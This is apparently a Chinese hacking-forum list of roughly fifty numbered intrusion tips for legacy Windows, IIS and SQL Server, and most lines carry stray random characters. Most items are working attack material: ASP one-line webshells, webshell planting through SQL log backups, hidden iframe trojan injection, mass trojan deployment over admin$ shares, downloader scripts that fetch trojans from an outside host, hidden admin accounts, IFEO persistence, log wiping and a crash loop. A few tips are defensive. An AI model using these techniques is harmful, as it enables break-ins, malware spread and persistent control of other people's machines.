Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
5 k% f7 u+ I8 c) |8 Rcacls C:\windows\system32 /G hqw20:R
t" N- v% b/ P! b: }. p" X! L9 p思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入& L- k, s5 _* L6 x
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
3 S9 ?) e! V1 |% M5 m0 ~! o+ V/ D) p4 w/ q& v4 K3 [7 N
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
V' i3 |, k& @: z" m! r8 @" x. Q& I7 v& j/ r% t
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 F3 I, ]( I# \5 j$ u$ m
4 x! S0 H4 t$ h \, R: w9 Z4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
$ c/ u1 c3 g. ]9 d1 F: Y# J# r! b$ u. K; z8 _
5、利用INF文件来修改注册表
+ U R* r8 _1 x! S3 J0 A[Version]
. c& P q* x: Q( ZSignature="$CHICAGO$"" a8 D* H$ c; m3 y$ i# B3 E
[Defaultinstall]
+ J6 V; m* i, \$ IaddREG=Ating
0 T/ x# X) s* d; K[Ating]2 d# p6 W2 W$ K% \# w
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"* `3 x& I, n( N; v0 Q% ?
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下: a7 N, X' h! U
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
1 V# x4 h' B1 E* ~% l& C- J其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU. @' c; ], N% `( M( a
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# j% M6 c7 _0 Z# `, L! F9 Q! y+ _
HKEY_CURRENT_CONFIG 简写为 HKCC! {7 M O7 A, B
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值 _ k# _0 L# T: b6 F/ v8 h
"1"这里代表是写入或删除注册表键值中的具体数据9 T4 j$ h Z) ~0 V
+ g5 Z9 G! M' s0 e. o# ^2 f6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,) k9 A) g t. {' S" G
多了一步就是在防火墙里添加个端口,然后导出其键值9 y2 M4 M) Q5 P# Z
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]! U' |% [ A& @6 W
% g% u: O9 s) I0 e6 i/ B( z
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
; N" ^% C. D: k在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。5 o% x6 s/ A" B. p- @+ ~
% M7 y: K! l6 l2 p9 k! K& y9 P" }# A1 v
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。% h' J" o! O! E& @* |" C/ V
7 q7 B) \/ J. H, J1 k2 [* q# m. _8 J
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,) C* l$ G# K5 W# V- t
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。% {/ L" q: P8 G' q! E
" i2 m! c" d2 i10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
, l/ W( @2 `% r, H8 q' A/ x9 q$ `3 p' P" I. L/ O! k1 {
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
1 a n4 x, _" c p5 q$ q用法:xsniff –pass –hide –log pass.txt
3 }9 w, y# ~9 o- Q+ }, B- N6 y9 C$ V+ G) ?8 e9 C" y
12、google搜索的艺术
! I' o& U7 A9 `0 w* E9 D7 ?. l搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ I6 V" i4 S/ r/ U6 F# }! F或“字符串的语法错误”可以找到很多sql注入漏洞。
) h% R& y, `! z. t* H+ b4 r. g+ ^% @% y
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
[ Z1 Y1 C/ y# Y: N C' I% Q4 ~# x
14、cmd中输入 nc –vv –l –p 1987
" g5 k; l5 v# q$ l- ?8 e" u8 q Y做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
* c/ K+ L! G2 L4 u! ]
1 x/ ]5 g1 |6 q3 p: R15、制作T++木马,先写个ating.hta文件,内容为; z) r6 o+ m) t r; A
<script language="VBScript">6 ?5 M9 w& M" L( g2 W9 P
set wshshell=createobject ("wscript.shell" )0 e/ O" Z+ d7 S X# v
a=wshshell.run("你马的名称",1)6 ?% x3 K- D( Z q& U8 }
window.close
' {/ l0 h0 q) B. @</script>
" R( u' h) O+ C2 Y再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. Q- T* i; E H* J! `, q8 q; c+ }
16、搜索栏里输入, c1 s, E+ r* G5 X0 e
关键字%'and 1=1 and '%'='
9 U, }- a# @' Q' a) s" L& Z关键字%'and 1=2 and '%'='% u8 S# I7 `1 ?) X6 r* j5 C
比较不同处 可以作为注入的特征字符% t+ {6 h+ E m8 D2 w( j
]+ M9 ?- ~+ @4 z/ K$ g17、挂马代码<html>
; K( ]9 |; L* K<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>* p) C: O# {8 ?- k( k
</html>- c" ?5 c& M, V. q+ r
* i+ y1 P& a4 _$ ~4 Y9 l18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
; h2 _+ _1 A9 @1 A( ~' Cnet localgroup administrators还是可以看出Guest是管理员来。7 a w% f+ [5 p6 ]
! w [5 @( I0 c. X5 S& I19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
% H$ }' b' ~3 k6 ^, h用法: 安装: instsrv.exe 服务名称 路径
& `/ l* R) q& t. E$ ]' G% ]' Q6 t卸载: instsrv.exe 服务名称 REMOVE3 w3 ?2 [# L- q; ]
. R: X' h( g+ J) l1 n
* k' w( v: q. l; X6 o/ ?
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉1 x' \' `: V- {( K
不能注入时要第一时间想到%5c暴库。- ?# y' T/ B+ N/ I$ ^
) `, q* o# A/ k1 }0 n9 I22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
, G9 R2 @5 ^% v! S
5 J \* `6 H; R z3 E5 x$ Y23、缺少xp_cmdshell时 w1 _* |4 _# T4 H$ L
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
8 x% b% f3 ^- w8 @" [3 @- ^假如恢复不成功,可以尝试直接加用户(针对开3389的)! i) S$ A) u9 P2 V; d0 b+ N
declare @o int. Z2 ` Z; @5 q4 V: e" x
exec sp_oacreate 'wscript.shell',@o out, b' }* r$ q0 C w3 f& z1 @
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) o& D2 m/ U! k3 J
9 |& l; ]2 ^5 \3 K: \24.批量种植木马.bat
8 Q/ M+ V9 j" C& W$ I$ Jfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中 i, x D7 f$ A! x7 c9 n
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间 {" `) A; j1 \# e2 o
扫描地址.txt里每个主机名一行 用\\开头
7 T+ v; `+ S, S9 s! C9 F: K3 x. S. b, ~% R
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
- ?9 q9 ?' s2 q6 A( _
4 b! U Y# r4 T k1 e26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& a, U* i( ?" o8 N" M$ h7 {# K$ g% r) G将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.+ K/ p7 p/ i* D; u7 k1 W# Y
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马2 B, _9 f N( A$ x" b1 o
+ ~ B7 `" j# M4 j) c8 F5 w% v
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP: C: v* C' T; w
然后用#clear logg和#clear line vty *删除日志
; y) x4 I! r3 B! R9 ?' l
+ b% |7 v- {) v- t) U5 a$ ?28、电脑坏了省去重新安装系统的方法
% |- d& B0 [! ?1 Y# |8 y( N4 S纯dos下执行,
- i3 B" Z; t: kxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
7 U+ C2 N. b) G, z& }3 E& S K2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config7 X6 M5 K, F+ Z& G, x6 v- r* Z
1 b/ C8 r) O2 m* b0 L) r2 j
29、解决TCP/IP筛选 在注册表里有三处,分别是:) F8 l) g) [" R5 x$ K3 J+ q6 U
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, x0 Q- Q7 t& |" h( C) @
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 f. S6 i7 ]+ f: N5 [. |2 EHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# `5 k/ H; j. X. M0 i+ G& x& f分别用
6 s# U& i: r+ m+ uregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip2 B- [' u# L7 y. C& W1 O
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- h" y* o# r+ D+ I( Y6 V1 ?1 lregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 d9 O" w$ H; X( ~4 B命令来导出注册表项 Y, u: ?. j8 \9 {% k% F9 H
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
( O% n: u2 X6 l. i改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用7 k! U w& ]: z2 n) M3 I% t
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
7 {3 w2 x- x1 h' v5 ?0 a- S! h. U5 U" u/ }7 \) A
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
( V: c5 f6 V2 b4 M" X. jSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3& ^: ?+ j2 i2 D: V, w( O
5 w" l2 t0 x2 x
31、全手工打造开3389工具
# a2 }0 K! C/ \( E$ ?打开记事本,编辑内容如下:
! M7 w* J1 Q5 U Y$ N5 k$ Techo [Components] > c:\sql
0 B! J6 s" I5 ^! b1 W4 ^echo TSEnable = on >> c:\sql4 V5 Y6 P) @" q1 F3 Q" i
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
8 g8 R5 P: }4 x6 Y编辑好后存为BAT文件,上传至肉鸡,执行
d/ o& b4 b* F* |5 S0 ~. d( T! g7 |3 V f/ E8 G, ]' G4 v
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
1 l5 J1 W1 v/ k7 i
3 ]( N- N3 r) U/ ~/ x% m1 ?/ W/ e33、让服务器重启
- _8 K0 X1 M0 K# Y. X写个bat死循环:5 E% b! t# b5 ?
@echo off
5 C m; F M% h/ R. O5 w:loop1
; Y8 K. m6 y$ k6 O; q' lcls
% R; }1 q3 A! P4 G: Q; r% astart cmd.exe
5 \! {8 a# f0 {' d! }goto loop1
, v! S" v" K( d" c0 ?保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启' s; p; I, t4 K& c: e! G6 X0 l! r
0 b5 e$ _% S4 d34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你, D' ?% S/ ?8 {4 S' ^( U# \* f9 ^
@echo off( f' Z* L# o' a
date /t >c:/3389.txt
7 b& y$ W: T& @7 g3 qtime /t >>c:/3389.txt
$ h& Q% _7 c+ h9 f, _- {attrib +s +h c:/3389.bat
9 f# F. I! @" eattrib +s +h c:/3389.txt
% Y* Y: Y8 x3 [' h' J. Unetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt+ |! \ f/ Y. m
并保存为3389.bat
c- ?1 X1 d; u8 t* h打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- e: @% V2 X6 w* g! w2 ]
" Z9 T' \8 D9 ` B5 \- Y5 }35、有时候提不了权限的话,试试这个命令,在命令行里输入:
9 D7 N& ~* S9 X1 x' Wstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
- a1 W# C: V9 a/ z$ H+ K% z输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。$ s. p4 x- q* V) i: |& h
& n4 U. t) z* v$ R: _3 h
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
. ~; {$ o& @0 b0 c, T% h5 J4 v$ Jecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
% h/ Y; e: Q. i% `- cecho 你的FTP账号 >>c:\1.bat //输入账号
* S. M7 d# I" P2 lecho 你的FTP密码 >>c:\1.bat //输入密码6 ?; [3 [& r: x" b3 ]
echo bin >>c:\1.bat //登入
& q: i* l: I( K8 Zecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 k( b) M9 W" N4 v3 l: hecho bye >>c:\1.bat //退出
% G. ~7 {( T. j然后执行ftp -s:c:\1.bat即可& H5 d9 L3 z9 j5 G/ J6 p6 d- q
, g1 }' F" ], }$ q1 c6 ^8 H4 V% E37、修改注册表开3389两法
. _4 }+ C5 L' g8 m7 c(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
5 j) D& K/ W" V' Z6 g2 @# V& m7 Mecho Windows Registry Editor Version 5.00 >>3389.reg" E! O, v2 m; ^: n- V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg( `& p6 O- C9 s1 p# H7 J/ _
echo "Enabled"="0" >>3389.reg2 A8 u/ {' X! c9 `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows6 s7 _, k% p( x4 p! w" X+ z5 g
NT\CurrentVersion\Winlogon] >>3389.reg
+ h; z7 a/ W$ J, f) r1 Z9 jecho "ShutdownWithoutLogon"="0" >>3389.reg
/ I1 d# R3 A) {' Z+ T4 |echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]( Y* L9 q4 {. B
>>3389.reg) z; l4 Z5 f3 [- Y: B! P$ Q( t3 }+ d; l
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg0 k& y9 t& C# L& V4 o8 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]5 _' _' Z3 y9 U% N3 z, o1 Q; t
>>3389.reg; y( r1 n" q5 g4 V2 ]" T
echo "TSEnabled"=dword:00000001 >>3389.reg
& L- \& G" W$ x3 i( b: \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg* D1 E* ?+ r( Y: ^- `2 p
echo "Start"=dword:00000002 >>3389.reg
+ k) C2 l9 `( M- l9 I" gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]) P4 t. F8 g2 U" C& ^
>>3389.reg
, [3 p) x0 D2 y+ V# B3 Decho "Start"=dword:00000002 >>3389.reg6 s6 i' F a: _# G' r+ P Y: I1 m- e
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
/ p0 Q) r7 \$ B7 @. ^, D) @echo "Hotkey"="1" >>3389.reg
z4 v, _: j9 `0 j* \+ kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) n" u2 y/ @6 `2 p* d4 {Server\Wds\rdpwd\Tds\tcp] >>3389.reg
+ n! I3 {# I# Jecho "PortNumber"=dword:00000D3D >>3389.reg
! ~9 t {1 n0 _' \. |$ e6 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ j0 k! ^2 q+ B3 I( X0 e' C+ Y" m; JServer\WinStations\RDP-Tcp] >>3389.reg
5 T5 Y; N l& u( c! fecho "PortNumber"=dword:00000D3D >>3389.reg8 u& h4 X( b' }7 f+ c
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
5 W4 D' B Y K: t$ j* C(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)$ b' g* J1 K \" F0 B1 N3 I$ G
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
# I3 I' J: f0 S( F$ v4 }8 J(2)winxp和win2003终端开启
& ]* j0 u1 M- A; O( {) f8 m用以下ECHO代码写一个REG文件:+ V% a9 o% F8 ]1 O+ W7 m' p0 [6 Y& r
echo Windows Registry Editor Version 5.00>>3389.reg! g% `8 E, y% R. O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 W. q1 l( T1 L c f: n' }2 ?& c0 }
Server]>>3389.reg
, c: j# |0 |; n; W O# G: Wecho "fDenyTSConnections"=dword:00000000>>3389.reg
' D% h& F0 j: C0 Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
K L/ }( ]( B4 m" G, C! DServer\Wds\rdpwd\Tds\tcp]>>3389.reg
" ]; e- I$ A# i. Q" L2 v9 \! Kecho "PortNumber"=dword:00000d3d>>3389.reg6 H/ V( e+ i% R8 F( K4 |9 @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 ~$ L$ s7 H5 u. ` b* |" yServer\WinStations\RDP-Tcp]>>3389.reg
" l2 j" D0 M0 D2 i/ ?- m3 aecho "PortNumber"=dword:00000d3d>>3389.reg
1 V& R$ J: k& i5 _- g; E, s然后regedit /s 3389.reg del 3389.reg* n; ~' l* @7 }# X( X
XP下不论开终端还是改终端端口都不需重启
4 k1 {1 {$ C) _( l% a. B
X8 A4 I; G z- j* ?% C4 d l# F38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃4 S1 v- G6 r1 Z7 c
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'$ p4 F$ ?7 z$ w/ b3 `, n
& F/ }' B0 ^2 U
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!% S& b0 j$ G/ \ v5 r' i' B% I
(1)数据库文件名应复杂并要有特殊字符
9 |( M% a$ {" J2 K6 l(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
5 x" Y7 Q$ ~3 P! v将conn.asp文档中的2 ~* m9 z* K4 m$ d5 r3 x
DBPath = Server.MapPath("数据库.mdb")
2 K- G2 ?3 c' o' |conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ B2 }/ H, |" i7 e9 y6 T5 d4 A$ r2 r3 I# {3 j) l
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
$ K7 v8 C. \# |4 R% }(3)不放在WEB目录里! |* Y, w& ?1 ]( @2 }: m) R' I
& y j* Y7 b# q+ _! ~8 t
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
1 a. X% m7 u, Z- A2 ~可以写两个bat文件
1 g# p4 N: Q ~* U0 s@echo off9 k3 g! W7 [; D! x' f
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe) v8 z. t- Z c
@del c:\winnt\system32\query.exe
! X) Y% }* Y5 l! E! h@del %SYSTEMROOT%\system32\dllcache\query.exe
& h0 @- p/ n( }4 F( f6 x4 d@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的$ i/ m/ ^1 f' d# v" @) g
3 \6 V4 e) b5 s% N9 l2 f+ f, O@echo off
1 U `+ N, P' A- q' Q# D2 p@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
! Y1 v$ C$ z, L6 g4 v( ], h2 C@del c:\winnt\system32\tsadmin.exe
7 M, r1 O4 x- ^* v@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex! j' p/ B9 x+ z6 o1 _! R
) W( F+ Y9 a+ A41、映射对方盘符
5 i) ?9 I, [! F9 A: Vtelnet到他的机器上,
& {, k- Y1 P- y3 l5 C1 N$ P5 {& lnet share 查看有没有默认共享 如果没有,那么就接着运行
9 @) Q- L9 M& t0 g' b |net share c$=c:
) G/ x# c: B! \+ n& T* enet share现在有c$! F1 a! c8 f3 } ]9 U
在自己的机器上运行
$ d/ A4 z( t/ K% i1 ?net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
$ Z9 R& A7 G/ X! ^; a- `1 K( g
1 b- @2 i! Q S ?* j42、一些很有用的老知识( Y0 h3 U/ H& U6 Y! L& t' X
type c:\boot.ini ( 查看系统版本 )4 h) }! t# u6 P6 l* g
net start (查看已经启动的服务)
. U) g I p5 J1 L6 Lquery user ( 查看当前终端连接 )
- }$ q3 K9 G5 I! I- O# { ]net user ( 查看当前用户 )) o Q6 \6 o% O1 {( Q
net user 用户 密码/add ( 建立账号 )
* I( M: a4 F" O8 g4 gnet localgroup administrators 用户 /add (提升某用户为管理员)* e- B" V/ W4 y2 W% x
ipconfig -all ( 查看IP什么的 )
8 l. {, u+ {. P- Q( \' dnetstat -an ( 查看当前网络状态 )9 {4 ?& J/ u8 J+ C0 E
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)0 z0 Y: k$ O# z$ ^1 p
克隆时Administrator对应1F4$ g5 {9 B4 h! W) e6 ~8 N
guest对应1F5 {! m% A7 Z+ D/ `9 j
tsinternetuser对应3E81 o# ^4 r5 e" I. P
' R, P- t/ ~. c( @* W: X: j# X43、如果对方没开3389,但是装了Remote Administrator Service9 Q F0 ?( j$ ~. E
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接' {: K* |5 d5 }% S/ y$ M0 o
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
r: N) J. d+ V; }' @$ i先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
/ ~) a, O" p1 A3 N) N. S: z, R9 m( ^+ m! B! \9 ~
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
7 c- U% N6 q& R+ H5 i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
& V& [- ^1 c/ x3 M
, b1 N4 n% s' @* d+ u45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)! t7 h9 c: F+ X4 I9 ~$ I
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
) O5 ~+ E& k$ L1 P^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
( Y2 W0 m) c9 E0 ~/ v* Q# WCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
: T7 h* _/ j; m, V: }1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
; p' y- S6 L! u/ Q) e Z(这是完整的一句话,其中没有换行符)- H. N8 B+ M1 L& D3 _
然后下载:8 J' E+ y2 ?; s# V
cscript down.vbs http://www.hack520.org/hack.exe hack.exe+ C) v* Q ~, T: q+ f0 p8 l0 b
' X% d; d' y* L
46、一句话木马成功依赖于两个条件:
7 A1 A1 ` g! G, z) x1、服务端没有禁止adodb.Stream或FSO组件
$ T: r, m; H/ n2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
7 G3 n% |3 |0 u+ q
+ o' `) P" o6 [; k47、利用DB_OWNER权限进行手工备份一句话木马的代码:, ]! I: a; ^- _ _3 j$ j. z' z5 L0 g
;alter database utsz set RECOVERY FULL--
9 [" [& K7 K3 c1 ~, K5 h;create table cmd (a image)--
( B( y4 S' q. u( F# Q4 Y- v;backup log utsz to disk = 'D:\cmd' with init--
1 z7 R' C+ R( W8 q8 x3 I- j;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--6 r/ w0 e# P' g5 W; C+ c8 ~+ D
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
. p4 z6 l0 m0 f; \7 |注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
$ Y1 h1 ^) v$ V& w+ B9 R/ J
$ J, g( }$ a/ U! P; s `48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
6 U1 ] q5 K# m! R
0 ~# ~- R4 F. O! F0 x/ f用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options8 |. C" h, G% N. E8 Z' l5 D
所有会话用 'all'。- W; Y) A% A$ ~8 ^* Z+ |/ q% {* s
-s sessionid 列出会话的信息。
- G! T, R2 `1 ]# Z# Q3 B( J# z) l-k sessionid 终止会话。
/ i% ]" e1 C/ g2 s6 X-m sessionid 发送消息到会话。: Q3 _& S6 a! U8 B
1 j2 C- @& U7 V+ e4 bconfig 配置 telnet 服务器参数。: Y! ?# x) D) k+ O
5 S0 v, q4 n1 Acommon_options 为:
" D- P" V" b( f Y3 p9 D9 w: ?) [-u user 指定要使用其凭据的用户
6 O' F$ p4 G) V; V1 D-p password 用户密码% h# W; m; B) y0 Y% X
: g; v0 H6 o" Y1 t. Z4 J
config_options 为:
, L: n5 m: H; s V8 Udom = domain 设定用户的默认域
, }+ C" u# W+ k. r( B Xctrlakeymap = yes|no 设定 ALT 键的映射
' c4 C- _) ]6 q. a: ctimeout = hh:mm:ss 设定空闲会话超时值+ D% g0 C- a0 q/ m; s. {
timeoutactive = yes|no 启用空闲会话。( s3 b! s3 h( o& M9 M
maxfail = attempts 设定断开前失败的登录企图数。( g- b# A" J0 z9 I
maxconn = connections 设定最大连接数。
: b# S W$ p9 ?- K9 ^1 cport = number 设定 telnet 端口。
( J p, a$ i" ?- a/ h( y5 ?" lsec = [+/-]NTLM [+/-]passwd! }1 u( |5 Q: W! _ s% E% T
设定身份验证机构
' k, G- X7 H6 B+ A3 U P4 t, o4 ofname = file 指定审计文件名。7 k8 g% o' K: P, K
fsize = size 指定审计文件的最大尺寸(MB)。
$ T0 U1 z3 @7 f. S4 amode = console|stream 指定操作模式。7 H: i2 B. {2 W2 w
auditlocation = eventlog|file|both( P1 c' s) L! x' p- n: { g. ^# v
指定记录地点( h( k" w. q0 t4 F; M# t
audit = [+/-]user [+/-]fail [+/-]admin* @2 `6 T; N: y$ v
9 c4 f2 L, ^. T& Z
49、例如:在IE上访问:, b# f/ f0 T- W; X7 E& x' K" e
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/5 {% ~% c$ E' E# j" u
hack.txt里面的代码是:
8 U" c2 e5 t- D: M' m+ i, Z5 u<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">4 f: k- c% t. _& D9 I
把这个hack.txt发到你空间就可以了!8 m! g$ o0 t) b$ R" k6 f
这个可以利用来做网马哦!' z2 b7 m. v% y& _# X: k$ F
. }3 p% X7 S) s4 m# S" }: d50、autorun的病毒可以通过手动限制!
. r; m5 B* K- x% u! C1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
3 u O% T5 I6 q2,打开盘符用右键打开!切忌双击盘符~
; d. T# u- P4 J, y& w3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
$ u6 Y1 ^2 ^1 z( J& }5 S
% J7 X2 p8 l; y( l0 [) f, j5 D51、log备份时的一句话木马:
: ~4 B' i1 E0 ^6 Ca).<%%25Execute(request("go"))%%25>6 U* W# m, q+ u
b).<%Execute(request("go"))%>3 M: G( `+ U. M/ K5 u" l' `) B- H% @
c).%><%execute request("go")%><%
# \3 T2 k( z0 I( V. q% p' Rd).<script language=VBScript runat=server>execute request("sb")</Script>
# F4 ~2 Y/ B7 C$ T# H$ ]0 @e).<%25Execute(request("l"))%25>1 w6 z5 K" z5 q: e$ v( |8 e9 z6 m& |
f).<%if request("cmd")<>"" then execute request("pass")%>
( b) B( J) i' j6 Y7 O1 s" |1 J X$ ~
52、at "12:17" /interactive cmd( d& v5 J* I% ]2 d# p$ D
执行后可以用AT命令查看新加的任务; u" B3 m) A% k3 @
